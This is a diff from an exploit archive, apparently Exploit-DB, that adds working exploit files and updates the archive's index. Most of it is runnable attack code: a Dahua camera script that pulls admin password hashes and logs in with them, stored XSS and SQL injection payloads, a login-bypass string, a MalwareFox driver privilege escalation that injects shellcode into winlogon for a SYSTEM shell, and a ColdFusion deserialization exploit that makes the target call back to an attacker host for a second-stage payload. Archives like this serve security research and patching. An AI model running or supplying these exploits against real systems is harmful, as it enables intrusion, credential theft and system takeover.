# Login 2
|
||||
#
|
||||
print "[>] Logging in"
|
||||
|
||||
query_args = {"method":"global.login",
|
||||
"session":json_obj['session'],
|
||||
"params":{
|
||||
"userName":USER_NAME,
|
||||
"password":PWDDB_HASH,
|
||||
"clientType":"Web3.0",
|
||||
"authorityType":"OldDigest"},
|
||||
"id":10000}
|
||||
|
||||
URI = '/RPC2_Login'
|
||||
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,json_obj['session'])
|
||||
print response.read()
|
||||
|
||||
#
|
||||
# Wrong username/password
|
||||
# { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1997483520 }
|
||||
# { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1997734656 }
|
||||
#
|
||||
# Successfull login
|
||||
# { "id" : 10000, "params" : null, "result" : true, "session" : 1626533888 }
|
||||
#
|
||||
|
||||
#
|
||||
# Logout
|
||||
#
|
||||
print "[>] Logging out"
|
||||
query_args = {"method":"global.logout",
|
||||
"params":"null",
|
||||
"session":json_obj['session'],
|
||||
"id":10001}
|
||||
|
||||
URI = '/RPC2'
|
||||
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
|
||||
return response
|
||||
|
||||
#
|
||||
# Generation 3
|
||||
#
|
||||
def Gen3(self,response,headers):
|
||||
self.response = response
|
||||
self.headers = headers
|
||||
|
||||
json_obj = commentjson.load(self.response)
|
||||
if self.verbose:
|
||||
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
|
||||
|
||||
#
|
||||
# Check for first availible admin user
|
||||
#
|
||||
for who in json_obj[json_obj.keys()[0]]:
|
||||
if who['Group'] == 'admin': # Check if user is in admin group
|
||||
USER_NAME = who['Name'] # Save login name
|
||||
PWDDB_HASH = who['Password'] # Save hash
|
||||
print "[i] Choosing Admin Login: {}".format(who['Name'])
|
||||
break
|
||||
#
|
||||
# Request login
|
||||
#
|
||||
print "[>] Requesting our session ID"
|
||||
query_args = {"method":"global.login",
|
||||
"params":{
|
||||
"userName":USER_NAME,
|
||||
"password":"",
|
||||
"clientType":"Web3.0"},
|
||||
"id":10000}
|
||||
|
||||
URI = '/RPC2_Login'
|
||||
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
|
||||
|
||||
json_obj = json.load(response)
|
||||
if self.verbose:
|
||||
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
|
||||
#
|
||||
# Generate login MD5 hash with all required info we have downloaded
|
||||
#
|
||||
RANDOM = json_obj['params']['random']
|
||||
PASS = ''+ USER_NAME +':' + RANDOM + ':' + PWDDB_HASH + ''
|
||||
RANDOM_HASH = hashlib.md5(PASS).hexdigest().upper()
|
||||
|
||||
print "[i] Downloaded MD5 hash:",PWDDB_HASH
|
||||
print "[i] Random value to encrypt with:",RANDOM
|
||||
print "[i] Built password:",PASS
|
||||
print "[i] MD5 generated password:",RANDOM_HASH
|
||||
|
||||
#
|
||||
# Login
|
||||
#
|
||||
print "[>] Logging in"
|
||||
|
||||
query_args = {"method":"global.login",
|
||||
"session":json_obj['session'],
|
||||
"params":{
|
||||
"userName":USER_NAME,
|
||||
"password":RANDOM_HASH,
|
||||
"clientType":"Web3.0",
|
||||
"authorityType":"Default"},
|
||||
"id":10000}
|
||||
|
||||
URI = '/RPC2_Login'
|
||||
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,json_obj['session'])
|
||||
print response.read()
|
||||
|
||||
# Wrong username/password
|
||||
# { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1156538295 }
|
||||
# { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1175812023 }
|
||||
#
|
||||
# Successfull login
|
||||
# { "id" : 10000, "params" : null, "result" : true, "session" : 1175746743 }
|
||||
#
|
||||
|
||||
#
|
||||
# Logout
|
||||
#
|
||||
print "[>] Logging out"
|
||||
query_args = {"method":"global.logout",
|
||||
"params":"null",
|
||||
"session":json_obj['session'],
|
||||
"id":10001}
|
||||
|
||||
URI = '/RPC2'
|
||||
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
|
||||
return response
|
||||
|
||||
#
|
||||
# Validate correctness of HOST, IP and PORT
|
||||
#
|
||||
class Validate:
|
||||
|
||||
def __init__(self,verbose):
|
||||
self.verbose = verbose
|
||||
|
||||
# Check if IP is valid
|
||||
def CheckIP(self,IP):
|
||||
self.IP = IP
|
||||
|
||||
ip = self.IP.split('.')
|
||||
if len(ip) != 4:
|
||||
return False
|
||||
for tmp in ip:
|
||||
if not tmp.isdigit():
|
||||
return False
|
||||
i = int(tmp)
|
||||
if i < 0 or i > 255:
|
||||
return False
|
||||
return True
|
||||
|
||||
# Check if PORT is valid
|
||||
def Port(self,PORT):
|
||||
self.PORT = PORT
|
||||
|
||||
if int(self.PORT) < 1 or int(self.PORT) > 65535:
|
||||
return False
|
||||
else:
|
||||
return True
|
||||
|
||||
# Check if HOST is valid
|
||||
def Host(self,HOST):
|
||||
self.HOST = HOST
|
||||
|
||||
try:
|
||||
# Check valid IP
|
||||
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
|
||||
# Now we check if it is correct typed IP
|
||||
if self.CheckIP(self.HOST):
|
||||
return self.HOST
|
||||
else:
|
||||
return False
|
||||
except socket.error as e:
|
||||
# Else check valid DNS name, and use the IP address
|
||||
try:
|
||||
self.HOST = socket.gethostbyname(self.HOST)
|
||||
return self.HOST
|
||||
except socket.error as e:
|
||||
return False
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
#
|
||||
# Help, info and pre-defined values
|
||||
#
|
||||
INFO = '[Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]\n'
|
||||
HTTP = "http"
|
||||
HTTPS = "https"
|
||||
proto = HTTP
|
||||
verbose = False
|
||||
raw_request = True
|
||||
rhost = '192.168.5.2' # Default Remote HOST
|
||||
rport = '80' # Default Remote PORT
|
||||
creds = False # creds = 'user:pass'
|
||||
|
||||
|
||||
#
|
||||
# Try to parse all arguments
|
||||
#
|
||||
try:
|
||||
arg_parser = argparse.ArgumentParser(
|
||||
prog=sys.argv[0],
|
||||
description=('[*] '+ INFO +' [*]'))
|
||||
arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
|
||||
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
|
||||
if creds:
|
||||
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
|
||||
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
|
||||
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
|
||||
args = arg_parser.parse_args()
|
||||
except Exception as e:
|
||||
print INFO,"\nError: %s\n" % str(e)
|
||||
sys.exit(1)
|
||||
|
||||
# We want at least one argument, so print out help
|
||||
if len(sys.argv) == 1:
|
||||
arg_parser.parse_args(['-h'])
|
||||
|
||||
print "\n[*]",INFO
|
||||
|
||||
if args.verbose:
|
||||
verbose = args.verbose
|
||||
#
|
||||
# Check validity, update if needed, of provided options
|
||||
#
|
||||
if args.https:
|
||||
proto = HTTPS
|
||||
if not args.rport:
|
||||
rport = '443'
|
||||
|
||||
if creds and args.auth:
|
||||
creds = args.auth
|
||||
|
||||
if args.rport:
|
||||
rport = args.rport
|
||||
|
||||
if args.rhost:
|
||||
rhost = args.rhost
|
||||
|
||||
# Check if RPORT is valid
|
||||
if not Validate(verbose).Port(rport):
|
||||
print "[!] Invalid RPORT - Choose between 1 and 65535"
|
||||
sys.exit(1)
|
||||
|
||||
# Check if RHOST is valid IP or FQDN, get IP back
|
||||
rhost = Validate(verbose).Host(rhost)
|
||||
if not rhost:
|
||||
print "[!] Invalid RHOST"
|
||||
sys.exit(1)
|
||||
|
||||
#
|
||||
# Validation done, start print out stuff to the user
|
||||
#
|
||||
if args.https:
|
||||
print "[i] HTTPS / SSL Mode Selected"
|
||||
print "[i] Remote target IP:",rhost
|
||||
print "[i] Remote target PORT:",rport
|
||||
|
||||
rhost = rhost + ':' + rport
|
||||
|
||||
headers = {
|
||||
'X-Requested-With' : 'XMLHttpRequest',
|
||||
'X-Request' : 'JSON',
|
||||
'User-Agent':'Dahua/2.0; Dahua/3.0'
|
||||
}
|
||||
|
||||
#
|
||||
# Try to find /current_config/passwd user database (Generation 2)
|
||||
#
|
||||
try:
|
||||
print "[>] Checking for backdoor version"
|
||||
URI = "/current_config/passwd"
|
||||
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None)
|
||||
print "[!] Generation 2 found"
|
||||
reponse = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request).Gen2(response,headers)
|
||||
except urllib2.HTTPError as e:
|
||||
#
|
||||
# If not, try to find /current_config/Account1 user database (Generation 3)
|
||||
#
|
||||
if e.code == 404:
|
||||
try:
|
||||
URI = '/current_config/Account1'
|
||||
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None)
|
||||
print "[!] Generation 3 Found"
|
||||
response = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request).Gen3(response,headers)
|
||||
except urllib2.HTTPError as e:
|
||||
if e.code == 404:
|
||||
print "[!] Patched or not Dahua device! ({})".format(e.code)
|
||||
sys.exit(1)
|
||||
else:
|
||||
print "Error Code: {}".format(e.code)
|
||||
except Exception as e:
|
||||
print "[!] Detect of target failed ({})".format(e)
|
||||
sys.exit(1)
|
||||
|
||||
print "\n[*] All done...\n"
|
||||
sys.exit(0)
|
19
exploits/php/webapps/43988.txt
Normal file
19
exploits/php/webapps/43988.txt
Normal file
|
@ -0,0 +1,19 @@
|
|||
######################################################################################
|
||||
# Exploit Title: PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS.
|
||||
# Date: 06.02.2018
|
||||
# Exploit Author: Prasenjit Kanti Paul
|
||||
# Web: http://hack2rule.wordpress.com/
|
||||
# Vendor Homepage: https://www.phpscriptsmall.com/
|
||||
# Software Link: https://www.phpscriptsmall.com/product/doctor-search-script/
|
||||
# Category: Web Application
|
||||
# Version: 1.0.2
|
||||
# Tested on: Linux Mint
|
||||
# CVE: CVE-2018-6655
|
||||
#######################################################################################
|
||||
|
||||
*Proof of Concept*
|
||||
1. Login as a user
|
||||
2. Goto "Edit Profile"
|
||||
3. Edit any field with "<script>alert("PKP")</script>"
|
||||
4. Save Profile
|
||||
5. You will be having a popup "PKP"
|
20
exploits/php/webapps/43989.txt
Normal file
20
exploits/php/webapps/43989.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
######################################################################################
|
||||
# Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS
|
||||
# Date: 06.02.2018
|
||||
# Exploit Author: Prasenjit Kanti Paul
|
||||
# Web: http://hack2rule.wordpress.com/
|
||||
# Vendor Homepage: https://www.phpscriptsmall.com/
|
||||
# Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script
|
||||
# Category: Web Application
|
||||
# Version: =>3.0
|
||||
# Tested on: Linux Mint
|
||||
# CVE: NA
|
||||
#######################################################################################
|
||||
|
||||
Proof of Concept
|
||||
=================
|
||||
1. Login as a user
|
||||
2. Goto "Edit Profile"
|
||||
3. Edit any field with "<script>alert("PKP")</script>"
|
||||
4. Save Profile
|
||||
5. You will be having a popup "PKP"
|
20
exploits/php/webapps/43990.txt
Normal file
20
exploits/php/webapps/43990.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
######################################################################################
|
||||
# Exploit Title: Naukri Clone Script - Stored XSS
|
||||
# Date: 06.02.2018
|
||||
# Exploit Author: Prasenjit Kanti Paul
|
||||
# Web: http://hack2rule.wordpress.com/
|
||||
# Vendor Homepage: https://www.phpscriptsmall.com/
|
||||
# Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/
|
||||
# Category: Web Application
|
||||
# Version: 3.0.3
|
||||
# Tested on: Linux Mint
|
||||
# CVE: na
|
||||
#######################################################################################
|
||||
|
||||
Proof of Concept
|
||||
=================
|
||||
1. Login as a jobseeker
|
||||
2. Goto "Edit Profile"
|
||||
3. Edit any field with "<script>alert("PKP")</script>"
|
||||
4. Save Profile
|
||||
5. You will be having a popup "PKP"
|
20
exploits/php/webapps/43991.txt
Normal file
20
exploits/php/webapps/43991.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
######################################################################################
|
||||
# Exploit Title: Hot Scripts Clone : Script Classified - Stored XSS
|
||||
# Date: 06.02.2018
|
||||
# Exploit Author: Prasenjit Kanti Paul
|
||||
# Web: http://hack2rule.wordpress.com/
|
||||
# Vendor Homepage: https://www.phpscriptsmall.com/
|
||||
# Software Link: https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/
|
||||
# Category: Web Application
|
||||
# Version: 3.1
|
||||
# Tested on: Linux Mint
|
||||
# CVE: na
|
||||
#######################################################################################
|
||||
|
||||
Proof of Concept
|
||||
=================
|
||||
1. Login to Hot Scripts Clone : Script Classified
|
||||
2. Select Any Ads
|
||||
3. Goto below review section and put "<script>alert("PKP")</script>" as
|
||||
title or description
|
||||
4. You will have popup of "PKP"
|
27
exploits/php/webapps/43994.txt
Normal file
27
exploits/php/webapps/43994.txt
Normal file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-02-07
|
||||
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
|
||||
# Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/
|
||||
# Version: 2.0.7
|
||||
# Category: Webapps
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands.
|
||||
# # # # #
|
||||
# Proof of Concept :
|
||||
|
||||
SQLi:
|
||||
|
||||
# server/login.php?normal&cid=[SQL]
|
||||
|
||||
# Parameter : cid (GET)
|
||||
# Type: UNION QUERY
|
||||
# Title: Generic UNION query (NULL) - 5 columns
|
||||
# payload : /*!00000UNION*/ ALL SELECT
|
||||
NULL,/*!00000Concat('L0RD',0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL
|
||||
/*!00000from*/ information_schema.columns where table_schema=schema()%23
|
||||
|
||||
Test :
|
||||
http://server/login.php?normal&cid=-2%20/*!00000UNION*/%20ALL%20SELECT%20NULL,/*!00000Concat(%27L0RD%27,0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL%20/*!00000from*/%20information_schema.columns%20where%20table_schema=schema()%23
|
22
exploits/php/webapps/43995.txt
Normal file
22
exploits/php/webapps/43995.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass
|
||||
# Dork: N/A
|
||||
# Date: 2018-02-07
|
||||
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
|
||||
# Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/
|
||||
# Version: 2.0.2
|
||||
# Category: Webapps
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Description:
|
||||
# With this exploit,attacker can login as any user without any authentication.
|
||||
# # # # #
|
||||
# Proof of Concept :
|
||||
|
||||
# 1) First go to login page .
|
||||
|
||||
# 2) Username : anything , Password : ' or 'x'='x
|
||||
|
||||
PoC Video :
|
||||
http://s8.picofile.com/file/8318741292/Autentication_Bypass.mp4.html
|
||||
|
||||
Test : http://server/login.php?lerr
|
205
exploits/windows/local/43987.c
Normal file
205
exploits/windows/local/43987.c
Normal file
|
@ -0,0 +1,205 @@
|
|||
/*
|
||||
Title: MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation
|
||||
Date: 03/02/2018
|
||||
Author: Souhail Hammou
|
||||
Vendor Homepage: https://www.malwarefox.com/
|
||||
Version: 2.74.0.150
|
||||
Tested on: Windows 7 32-bit / Windows 10 64-bit
|
||||
CVE: CVE-2018-6606
|
||||
*/
|
||||
#include <Windows.h>
|
||||
#include <TlHelp32.h>
|
||||
#include <stdio.h>
|
||||
|
||||
|
||||
BOOL RegisterProcessByIOCTL(HANDLE hDevice)
|
||||
{
|
||||
DWORD pid, BytesReturned;
|
||||
|
||||
/*
|
||||
IOCTL 0x80002010 registers a process, by its PID, as trusted by the driver. Registered
|
||||
processes can send special IOCTLs to the driver to do stuff like:
|
||||
- Enable/Disable real-time protection
|
||||
- Write to raw disk
|
||||
- Open full access handles to processes
|
||||
- ...etc
|
||||
|
||||
When a process sends a special IOCTL, the driver checks if that process is registered (as
|
||||
shown in the disassembly below at address 0000000140010573).
|
||||
However, when a process sends the IOCTL 0x80002010 to register a process by its PID, the driver
|
||||
doesn't check to see if the requestor itself is registered (0000000140010553).
|
||||
That way, any process can register any other process (including itself) with the driver.
|
||||
|
||||
.text:000000014001054A mov ebx, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.IoControlCode]
|
||||
.text:000000014001054D cmp ebx, 80002010h
|
||||
.text:0000000140010553 jz short find_ioctl_dispatcher ;jump past the check
|
||||
|
||||
[......]
|
||||
|
||||
.text:0000000140010573 mov edx, 1
|
||||
.text:0000000140010578 mov ecx, ebp ; Requestor_PID
|
||||
.text:000000014001057A call IsProcessRegistered
|
||||
.text:000000014001057F lea rdx, aMain_c
|
||||
.text:0000000140010586 test eax, eax
|
||||
.text:0000000140010588 jnz short loc_1400105C2
|
||||
.text:000000014001058A mov [rsp+68h+var_38], ebp
|
||||
.text:000000014001058E lea rax, aProcessidDIsNo
|
||||
.text:0000000140010595 mov edi, STATUS_ACCESS_DENIED
|
||||
|
||||
[......]
|
||||
|
||||
.text:00000001400105C8 find_ioctl_dispatcher: ; CODE XREF: sub_1400104BC+97j
|
||||
.text:00000001400105C8 ; sub_1400104BC+ACj
|
||||
|
||||
[......]
|
||||
|
||||
.text:0000000140010612 cmp ebx, 80002010h
|
||||
.text:0000000140010618 jz loc_1400106D7 ; dispatch the IOCTL
|
||||
*/
|
||||
|
||||
pid = GetCurrentProcessId(); //Register our process with the driver
|
||||
if (!DeviceIoControl(hDevice, 0x80002010, &pid, sizeof(DWORD), NULL, 0, &BytesReturned, NULL))
|
||||
{
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
DWORD GetWinlogonPID()
|
||||
{
|
||||
DWORD WinlogonPid = 0;
|
||||
PROCESSENTRY32 ProcessEntry;
|
||||
ProcessEntry.dwSize = sizeof(PROCESSENTRY32);
|
||||
|
||||
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||||
if (hSnapshot == INVALID_HANDLE_VALUE)
|
||||
{
|
||||
printf("[-] CreateToolhelp32Snapshot failed !\n");
|
||||
goto ret;
|
||||
}
|
||||
|
||||
if (!Process32First(hSnapshot, &ProcessEntry))
|
||||
{
|
||||
printf("[-] Process32First failed !\n");
|
||||
goto cleanup;
|
||||
}
|
||||
|
||||
do
|
||||
{
|
||||
if (!lstrcmp(ProcessEntry.szExeFile, "winlogon.exe"))
|
||||
{
|
||||
WinlogonPid = ProcessEntry.th32ProcessID;
|
||||
break;
|
||||
}
|
||||
} while (Process32Next(hSnapshot, &ProcessEntry));
|
||||
|
||||
cleanup:
|
||||
CloseHandle(hSnapshot);
|
||||
ret:
|
||||
return WinlogonPid;
|
||||
}
|
||||
int main(int argc, char** argv)
|
||||
{
|
||||
DWORD BytesReturned;
|
||||
DWORD winlogon_pid;
|
||||
HANDLE winlogon_handle;
|
||||
LPVOID RemoteAllocation;
|
||||
HANDLE hDevice;
|
||||
|
||||
printf("=== MalwareFox Anti-Malware 2.74.0.150 zam64.sys Local Privilege Escalation ===\n");
|
||||
printf(" Tested on Windows 10 64-bit \n");
|
||||
printf(" Souhail Hammou \n\n");
|
||||
printf("[*] Stage 1: Registering the process with the driver by sending IOCTL 0x80002010\n");
|
||||
|
||||
hDevice = CreateFile
|
||||
("\\\\.\\ZemanaAntiMalware",
|
||||
GENERIC_READ | GENERIC_WRITE,
|
||||
0,
|
||||
NULL,
|
||||
OPEN_EXISTING,
|
||||
FILE_ATTRIBUTE_NORMAL,
|
||||
NULL
|
||||
);
|
||||
if (hDevice == INVALID_HANDLE_VALUE)
|
||||
{
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
if (!RegisterProcessByIOCTL(hDevice))
|
||||
{
|
||||
printf("\t[-] Registration Failed !\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
printf("\t[+] Process registered.\n[*] Stage 2: \n");
|
||||
|
||||
printf("\t[+] Getting Winlogon's PID\n");
|
||||
winlogon_pid = GetWinlogonPID();
|
||||
|
||||
if (!winlogon_pid)
|
||||
{
|
||||
printf("\t[-] GetWinlogonPID() failed !\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n");
|
||||
|
||||
/*
|
||||
The dispatcher for IOCTL code 0x8000204C opens a full access handle, accessible from usermode, to a process.
|
||||
We use this IOCTL to open a full access handle to winlogon.exe.
|
||||
Note that this IOCTL can only be sent if the process is registered with the driver.
|
||||
*/
|
||||
if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, NULL))
|
||||
{
|
||||
printf("\t[-] DeviceIoControl 0x8000204C failed !\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n");
|
||||
|
||||
if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
|
||||
{
|
||||
printf("\t[-] VirtualAllocEx failed !\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
printf("\t[+] Writing shellcode to allocated memory\n");
|
||||
|
||||
/*msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread -f c*/
|
||||
unsigned char buf[] =
|
||||
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
|
||||
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
|
||||
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
|
||||
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
|
||||
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
|
||||
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
|
||||
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
|
||||
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
|
||||
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
|
||||
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
|
||||
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
|
||||
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
|
||||
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
|
||||
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
|
||||
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
|
||||
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
|
||||
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
|
||||
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
|
||||
"\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
|
||||
|
||||
if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned))
|
||||
{
|
||||
printf("\t[-] WriteProcessMemory Failed !\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
printf("\t[+] Spawning SYSTEM shell\n");
|
||||
if (!CreateRemoteThread(winlogon_handle, NULL, 0, RemoteAllocation, NULL, 0, NULL))
|
||||
{
|
||||
printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n");
|
||||
return 0;
|
||||
}
|
||||
}
|
37
exploits/windows/remote/43993.py
Executable file
37
exploits/windows/remote/43993.py
Executable file
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
|
||||
# Date: February 6, 2018
|
||||
# Exploit Author: Faisal Tameesh (@DreadSystems)
|
||||
# Company: Depth Security (https://depthsecurity.com)
|
||||
# Version: Adobe Coldfusion (11.0.03.292866)
|
||||
# Tested On: Windows 10 Enterprise (10.0.15063)
|
||||
# CVE: CVE-2017-3066
|
||||
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
|
||||
# Category: remote
|
||||
|
||||
# Notes:
|
||||
# This is a two-stage deserialization exploit. The code below is the first stage.
|
||||
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
|
||||
# After firing this exploit, and once the target server connects back,
|
||||
# JRMPListener will deliver the secondary payload for RCE.
|
||||
|
||||
import struct
|
||||
import sys
|
||||
import requests
|
||||
|
||||
if len(sys.argv) != 5:
|
||||
print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
|
||||
quit()
|
||||
|
||||
target_IP = sys.argv[1]
|
||||
target_port = sys.argv[2]
|
||||
callback_IP = sys.argv[3]
|
||||
callback_port = sys.argv[4]
|
||||
|
||||
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
|
||||
'\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
|
||||
struct.pack('>I', int(callback_port)) + \
|
||||
'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';
|
||||
|
||||
url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
|
||||
headers = {'Content-Type': 'application/x-amf'}
|
||||
response = requests.post(url, headers=headers, data=amf_payload, verify=False)
|
|
@ -5369,7 +5369,7 @@ id,file,description,date,author,type,platform,port
|
|||
40959,exploits/multiple/dos/40959.c,"Apple macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",dos,multiple,
|
||||
40964,exploits/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,dos,windows,
|
||||
40965,exploits/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",dos,windows,
|
||||
40985,exploits/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,linux,
|
||||
40985,exploits/hardware/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,hardware,
|
||||
40994,exploits/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",dos,multiple,
|
||||
40996,exploits/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",dos,php,
|
||||
41008,exploits/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1)",2017-01-11,COSIG,dos,multiple,
|
||||
|
@ -5393,7 +5393,7 @@ id,file,description,date,author,type,platform,port
|
|||
41215,exploits/multiple/dos/41215.html,"Apple WebKit - 'HTMLKeygenElement' Type Confusion",2017-02-01,"Google Security Research",dos,multiple,
|
||||
41216,exploits/multiple/dos/41216.html,"Apple WebKit - Type Confusion in RenderBox with Accessibility Enabled",2017-02-01,"Google Security Research",dos,multiple,
|
||||
41218,exploits/android/dos/41218.txt,"Google Android - RKP Information Disclosure via s2-remapping Physical Ranges",2017-02-01,"Google Security Research",dos,android,
|
||||
41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow (PoC)",2017-02-01,bashis,dos,hardware,
|
||||
41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS Devices - Buffer Overflow (PoC)",2017-02-01,bashis,dos,hardware,
|
||||
41222,exploits/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",dos,windows,
|
||||
